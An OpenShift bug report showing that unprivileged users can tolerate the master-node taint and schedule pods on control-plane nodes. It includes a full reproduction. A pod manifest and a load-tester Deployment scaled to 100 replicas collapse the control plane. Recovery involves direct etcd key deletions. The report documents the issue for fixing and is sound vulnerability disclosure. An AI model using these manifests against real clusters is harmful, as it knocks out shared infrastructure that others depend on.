Bug 1956497
Summary: | Non-openshift pods are running on master nodes even though .spec.mastersSchedulable` field has value `false`. | ||
---|---|---|---|
Product: | OpenShift Container Platform | Reporter: | arajapa |
Component: | kube-scheduler | Assignee: | Jan Chaloupka <jchaloup> |
Status: | CLOSED DEFERRED | QA Contact: | RamaKasturi <knarra> |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | 4.5 | CC: | akaris, aos-bugs, bhershbe, ealcaniz, gdiotte, jchaloup, mfojtik |
Target Milestone: | --- | ||
Target Release: | --- | ||
Hardware: | x86_64 | ||
OS: | Linux | ||
URL: | https://gss--c.visualforce.com/apex/Case_View?id=5002K00000uELdKQAW | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | If docs needed, set a value | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2021-05-17 08:36:10 UTC | Type: | Bug |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: |
Description
arajapa
2021-05-03 19:27:38 UTC
I was unable to link the bug to the case in SF, Case # is 02912203 From https://docs.openshift.com/container-platform/4.5/nodes/nodes/nodes-nodes-working.html#nodes-nodes-working-master-schedulable_nodes-nodes-working: ``` You can configure master nodes to be schedulable, meaning that new pods are allowed for placement on the master nodes. By default, master nodes are not schedulable. ... You can allow or disallow master nodes to be schedulable by configuring the mastersSchedulable field. ``` Some history: In the past it was enough to set node.Spec.Unschedulable to decide if a node is schedulable or not. This functionality was deprecated in 1.13 [1] and replaced by setting node.kubernetes.io/unschedulable taint [2]. The kube-scheduler still reads node.Spec.Unschedulable to decide if a node is feasible for scheduling. Though, if pods tolerates the taint, node.Spec.Unschedulable has no effect. When a pod tolerating the taint is created, the kubelet does not see anything wrong with it and just runs the pod even on the master nodes. It is the machine-config-operator that consumes mastersSchedulable field and based on its value, it either taints every master node with the following taint: Key: node-role.kubernetes.io/master Effect: NoSchedule or removes it. Then, either the pod tolerates the taint (and is scheduled to a master node) or it does not tolerate. Also, given the pod's nodename can be set explicitly, this issue is not about kube-scheduler but more about allowing a pod to tolerate any taint. Also, kubelet has no power if deciding a pod that tolerates the taint is supposed to run on its node. So this needs to be decided before a pod is created/updated. I.e. though admission plugins. The question is what's the criteria that will decide if a given pod is allowed to tolerate all taints (or specifically node-role.kubernetes.io/master:NoSchedule one). [1] https://github.com/kubernetes/kubernetes/blob/master/pkg/scheduler/framework/plugins/nodeunschedulable/node_unschedulable.go#L69-L72 [2] https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/#taint-based-evictions Are the pods that got scheduled to master nodes (despite mastersSchedulable set to false) created by an admin? Or, were they created by a user? If the former is true, we can update our documentation and provide a warning. If it's the latter case, I suggest to open an RFE where we can discuss the next steps to resolve this issue. In upstream kubernetes, there is nothing that stops a non-admin user from creating any toleration for any taint - at least according to the doc. https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/ It seems to be exactly the same in OpenShift. Here's my test with 4.6.23: Creating an unprivileged user and logging in with that user: ~~~ [root@openshift-jumpserver-0 ~]# export KUBECONFIG=/root/openshift-install/auth/kubeconfig [root@openshift-jumpserver-0 ~]# oc get clusterversion NAME VERSION AVAILABLE PROGRESSING SINCE STATUS version 4.6.23 True False 32d Cluster version is 4.6.23 [root@openshift-jumpserver-0 ~]# htpasswd -c -B -b users.htpasswd user1 MyPassword! Adding password for user user1 [root@openshift-jumpserver-0 ~]# oc create secret generic htpass-secret --from-file=htpasswd=users.htpasswd -n openshift-config secret/htpass-secret created [root@openshift-jumpserver-0 ~]# cat <<'EOF' | oc apply -f - apiVersion: config.openshift.io/v1 kind: OAuth metadata: name: cluster spec: identityProviders: - name: my_htpasswd_provider mappingMethod: claim type: HTPasswd htpasswd: fileData: name: htpass-secret EOF [root@openshift-jumpserver-0 ~]# oc login -u user1 --password=MyPassword! Login successful. You don't have any projects. You can try to create a new project, by running oc new-project <projectname> [root@openshift-jumpserver-0 ~]# oc whoami user1 ~~~ ~~~ oc new-project user1 cat <<'EOF' > pod.yaml apiVersion: v1 kind: Pod metadata: name: fedora-pod labels: app: fedora-pod spec: containers: - name: fedora image: fedora command: - sleep - infinity imagePullPolicy: IfNotPresent tolerations: - key: "node-role.kubernetes.io/master" operator: "Exists" effect: "NoSchedule" affinity: nodeAffinity: requiredDuringSchedulingIgnoredDuringExecution: nodeSelectorTerms: - matchExpressions: - key: kubernetes.io/hostname operator: In values: - "openshift-master-0" EOF oc apply -f pod.yaml ~~~ ~~~ [root@openshift-jumpserver-0 ~]# oc get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES fedora-pod 1/1 Running 0 21s 172.26.0.69 openshift-master-0 <none> <none> [root@openshift-jumpserver-0 ~]# ~~~ ~~~ [root@openshift-jumpserver-0 ~]# oc whoami user1 ~~~ So this is upstream: https://github.com/kubernetes/kubernetes/issues/48041 https://github.com/kubernetes/kubernetes/issues/61185 The last one auto-closed, I'm currently still checking if any progress was made beyond the discussions on the 2 issues. I created https://issues.redhat.com/browse/RFE-1856 Would that do it? Do you have any idea for a workaround (I suppoed that we cannot control this via SCC?) or do you know if further progress has been made upstream beyond https://github.com/kubernetes/kubernetes/issues/48041 https://github.com/kubernetes/kubernetes/issues/61185 Shall we close this BZ in favor of the RFE? Thanks, Andreas I updated the RFE with this, but I'll post it here, nevertheless. This might become a high priority issue for our customer, rather quickly. I am testing with virtualized masters, but I imagine that the issue can be reproduced similarly on baremetal machines by simply increasing the load further. If my test is valid, then malicious, unprivileged users can easily generate so much load on any given cluster that the control plane collapses. As an unprivileged user: ~~~ [root@openshift-jumpserver-0 ~]# oc whoami user1 ~~~ I create the following load-tester where each pod will allocate 1GB of memory and 1000ms of CPU time: ~~~ cat <<'EOF' > load.yaml apiVersion: apps/v1 kind: Deployment metadata: name: load-tester labels: app: load-tester spec: replicas: 1 selector: matchLabels: app: load-tester template: metadata: labels: app: load-tester spec: containers: - name: load-tester image: quay.io/akaris/hpa-tester:latest command: - /bin/bash - -c - "churn 1000 & mallocmb 1024 & sleep infinity" tolerations: - key: "node-role.kubernetes.io/master" operator: "Exists" effect: "NoSchedule" affinity: nodeAffinity: requiredDuringSchedulingIgnoredDuringExecution: nodeSelectorTerms: - matchExpressions: - key: node-role.kubernetes.io/master operator: In values: - "" EOF oc apply -f load.yaml ~~~ ~~~ [root@openshift-jumpserver-0 ~]# oc get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES fedora-pod 1/1 Running 0 18h 172.26.0.69 openshift-master-0 <none> <none> load-tester-7f85bc7d49-crgmn 1/1 Running 0 11s 172.24.0.120 openshift-master-1 <none> <none> ~~~ ~~~ [root@openshift-jumpserver-0 ~]# oc scale --replicas=100 deployment load-tester deployment.apps/load-tester scaled ~~~ That will spawn 100 pods of the same (each one using a full CPU and trying to alloc 1 GB ... so 33 of these pods per master) And this will create gigantic loads on the masters: ~~~ top - 08:43:07 up 33 days, 14:21, 1 user, load average: 350.09, 153.61, 59.21 Tasks: 639 total, 38 running, 598 sleeping, 0 stopped, 3 zombie %Cpu(s): 51.4 us, 41.8 sy, 0.0 ni, 0.0 id, 2.3 wa, 2.6 hi, 1.9 si, 0.0 st MiB Mem : 16034.0 total, 149.1 free, 14971.0 used, 913.8 buff/cache MiB Swap: 0.0 total, 0.0 free, 0.0 used. 634.4 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3208490 root 20 0 1931228 965940 15976 S 106.5 5.9 112:59.46 kube-apiserver 5994 root 20 0 9066628 446848 0 S 83.9 2.7 2993:04 etcd 2647 root 20 0 6455880 207508 0 S 22.6 1.3 5569:50 kubelet [root@openshift-master-1 ~]# ~~~ And the control plane will become unusable: ~~~ [root@openshift-jumpserver-0 ~]# time oc whoami Error from server (InternalError): an error on the server ("") has prevented the request from succeeding (get users.user.openshift.io ~) real 0m13.243s user 0m0.171s sys 0m0.041s [root@openshift-jumpserver-0 ~]# time oc get pods Unable to connect to the server: net/http: TLS handshake timeout real 0m12.181s user 0m0.198s sys 0m0.030s ~~~ The master nodes are super unresponsive due to the increased load and the OOM situation, and eventually the kubernetes control plane will not even answer: ~~~ [root@openshift-jumpserver-0 ~]# oc get pods The connection to the server api.ipi-cluster.example.com:6443 was refused - did you specify the right host or port? [root@openshift-jumpserver-0 ~]# ~~~ In order to recover, I had to go to my master nodes and run: ~~~ sudo -i systemctl stop kubelet ; crictl ps | grep load-tester | awk '{print $1}' | while read l ; do crictl stop $l ; done ~~~ The problem is that my SSH sessions were super unstable, too. I think at some point, the OOM killer killer my session. On another node, it literally took minutes to log in and I had to reboot it. Stopping the containers also took a long time. After I stopped kubelet and removed all load-tester pods, I had to manually delete the deployment and all associated pods from etcd. On one of the masters, I ran: ~~~ crictl ps | grep etcdctl crictl exec 28117d1ac36c4 etcdctl del /kubernetes.io/deployments/user1/load-tester crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/load | while read l ; do if [ "$l" != "" ]; then crictl exec 28117d1ac36c4 etcdctl del $l ; fi; done ~~~ After the cleanup, I made sure that all keys for the load-tester deployment were gone: ~~~ [root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/ /kubernetes.io/pods/user1/fedora-pod [root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/deployments/user1/ [root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/replicasets/user1/ [root@openshift-master-0 ~]# ~~~ And then, I could restart kubelet on all masters and the cluster finally recovered: ~~~ systemctl restart kubelet ~~~ - Andreas Thanks Andreas for filling the RFE. Given the potential severity of the issue, let's keep the BZ open for now. |